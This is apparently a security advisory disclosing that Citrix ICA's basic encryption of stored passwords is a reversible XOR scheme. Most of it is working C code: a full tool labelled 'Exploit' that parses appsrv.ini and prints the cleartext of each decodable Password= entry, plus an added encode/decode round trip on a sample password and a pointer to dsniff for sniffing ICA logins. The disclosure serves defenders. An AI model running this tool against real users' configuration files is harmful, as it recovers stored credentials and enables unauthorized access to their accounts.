Citrix ICA's basic encryption has been cracked
The ICA basic encryption algorithm is a variant of the simple XOR scheme used for saved Winframe passwords:
void decrypt(u_char key, u_char *p, int len)
{
	int i;

	/* len is the number of ciphertext bytes in p; the last index is len - 1 */
	for (i = len - 1; i > 0; i--)
		p[i] = p[i-1] ^ p[i] ^ key;
	p[0] ^= (key | 'C');
}
Exploit:
The following will decrypt stored Citrix ICA passwords (in appsrv.ini).
/*
  icadecrypt.c
  Dug Song <dugsong@monkey.org>
*/
#include <sys/types.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Decode a run of hex digit pairs from src into dst; returns bytes written or -1. */
int
hex_decode(char *src, u_char *dst, int outsize)
{
	char *p, *pe;
	u_char *q, *qe, ch, cl;

	pe = src + strlen(src);
	qe = dst + outsize;
	for (p = src, q = dst; p < pe && q < qe && isxdigit((unsigned char)*p); p += 2) {
		ch = tolower((unsigned char)p[0]);
		cl = tolower((unsigned char)p[1]);
		if ((ch >= '0') && (ch <= '9')) ch -= '0';
		else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10;
		else return (-1);
		if ((cl >= '0') && (cl <= '9')) cl -= '0';
		else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10;
		else return (-1);
		*q++ = (ch << 4) | cl;
	}
	return (q - dst);
}

/*
 * pass holds: 2-byte big-endian length, 1 key byte, then the payload.
 * Decrypts in place and NUL-terminates; returns 1 on success, 0 otherwise.
 */
int
ica_decrypt(u_char *pass, int len)
{
	u_short i;
	u_char *p, key;

	if (len < 4)
		return (0);
	/* the length field must match the number of bytes that follow it */
	i = ntohs(*(u_short *)pass);
	if (i != len - 2)
		return (0);
	key = pass[2];
	p = pass + 3;
	for (i -= 2; i > 0; i--)
		p[i] = p[i - 1] ^ p[i] ^ key;
	p[0] ^= (key | 'C');
	i = len - 3;
	memmove(pass, pass + 3, i);
	pass[i] = '\0';
	return (1);
}

void
usage(void)
{
	fprintf(stderr, "Usage: icadecrypt <file>\n");
	exit(1);
}

int
main(int argc, char *argv[])
{
	FILE *f;
	char line[1024];
	u_char pass[128];
	int len;

	if (argc != 2 || *argv[1] == '-')
		usage();
	if ((f = fopen(argv[1], "r")) == NULL) {
		perror("fopen");
		exit(1);
	}
	/* echo the file, adding a comment line before each decodable Password= entry */
	while (fgets(line, sizeof(line), f) != NULL) {
		if (strncmp(line, "Password=", 9) == 0) {
			/* leave one byte free for the terminating NUL */
			len = hex_decode(line + 9, pass, sizeof(pass) - 1);
			if (ica_decrypt(pass, len))
				printf("; icadecrypt: [%s]\n", (char *)pass);
		}
		printf("%s", line);
	}
	fclose(f);
	exit(0);
}
/* 5000. */
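The stored value carries its own key byte, so a Password= entry in appsrv.ini should be treated as equivalent to the cleartext password. The round trip below is an added example, not part of Dug Song's code or the Citrix client: ica_encode() is derived here by inverting the decrypt loop above, and the password and key byte are constructed sample values.

```c
#include <stdio.h>
#include <string.h>

/* Blob layout checked by ica_decrypt(): 2-byte big-endian length of
 * (key + payload), then the 1-byte key, then the XOR-chained payload. */

/* Inverse of the page's transform; derived here, not vendor code. */
size_t ica_encode(unsigned char key, const char *pw,
                  unsigned char *out, size_t outsize)
{
	size_t n = strlen(pw), i;

	if (n == 0 || n > 0xfffe || n + 3 > outsize)
		return 0;
	out[0] = (unsigned char)((n + 1) >> 8);
	out[1] = (unsigned char)((n + 1) & 0xff);
	out[2] = key;                      /* the key is stored in the clear */
	out[3] = (unsigned char)(pw[0] ^ (key | 'C'));
	for (i = 1; i < n; i++)            /* each byte chains on the previous one */
		out[3 + i] = (unsigned char)(pw[i] ^ out[3 + i - 1] ^ key);
	return n + 3;
}

/* Same steps as ica_decrypt(), without modifying the input blob. */
int ica_decode(const unsigned char *blob, size_t len, char *pw, size_t pwsize)
{
	size_t n, i;

	if (len < 4 || (size_t)((blob[0] << 8) | blob[1]) != len - 2)
		return 0;                      /* length field must match */
	n = len - 3;
	if (n + 1 > pwsize)
		return 0;
	pw[0] = (char)(blob[3] ^ (blob[2] | 'C'));
	for (i = 1; i < n; i++)
		pw[i] = (char)(blob[3 + i - 1] ^ blob[3 + i] ^ blob[2]);
	pw[n] = '\0';
	return 1;
}

int main(void)
{
	unsigned char blob[64];
	char out[64];
	/* "Winter2000!" and key 0x5a are constructed sample values. */
	size_t len = ica_encode(0x5a, "Winter2000!", blob, sizeof(blob));
	/* No secret is supplied to the decoder: the key is read from blob[2]. */
	if (len && ica_decode(blob, len, out, sizeof(out)))
		printf("recovered from blob alone: %s\n", out);
	return 0;
}
```

Changing the key byte changes the stored bytes but not what can be recovered from them, because the decoder needs nothing beyond the blob itself.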
----------------
Demonstration code to sniff (and decrypt) ICA network authentication is available at:
http://www.monkey.org/~dugsong/dsniff/
Citrix offers a secure alternative called SecureICA, which uses Diffie-Hellman for key exchange and RC5 to encrypt the underlying transport (now at 128-bit strength worldwide). While this is certainly better than the simple XOR scheme outlined above, it may still be vulnerable to an active man-in-the-middle attack. Caveat user.
http://www.citrix.com/products/sica/
(NOTE: The SecureICA supported client is only available for Windows)